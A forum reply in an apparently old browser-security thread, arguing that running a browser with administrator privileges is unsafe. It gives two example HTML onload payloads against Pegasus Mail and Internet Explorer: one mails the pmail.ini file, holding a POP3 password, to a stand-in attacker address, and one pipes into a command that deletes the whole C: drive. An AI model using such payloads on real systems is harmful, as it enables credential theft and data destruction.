Re: techport80

new topic     » goto parent     » topic index » view thread      » older message » newer message 

Kat wrote:
>  If you have IE 6.x it may be a bit harder to disable Java, since MS has taken
>
> away many of those settings which allow you to close the backdoors and 
> loopholes. Javascript is even worse. Do you want to show webpages, or do 
> you want people to open up their computers to any ole script kiddie? If you 
> require me to breach security on my computers to see your webpages, let 
> me assure you it's not worth it.

You are never safe on a system where web broswer runs under root privilegies.
Even with all scripting disabled.

Eg. with Pegasus Mail v3.12c and IE using this HTML:

    <body onload="mailto:evilman at here.com -F c:\pmail\mail\Kat\pmail.ini">

I can possibly obtain your POP3 password. Or this :

    <body onload="mailto:evilman at here.com -F c:\test.txt | deltree c:\*.*">

may delete some files. Somebody who is about security should be running
at least Win2000. (But I am on Win98 blink

    Martin

new topic     » goto parent     » topic index » view thread      » older message » newer message

Search



Quick Links

User menu

Not signed in.

Misc Menu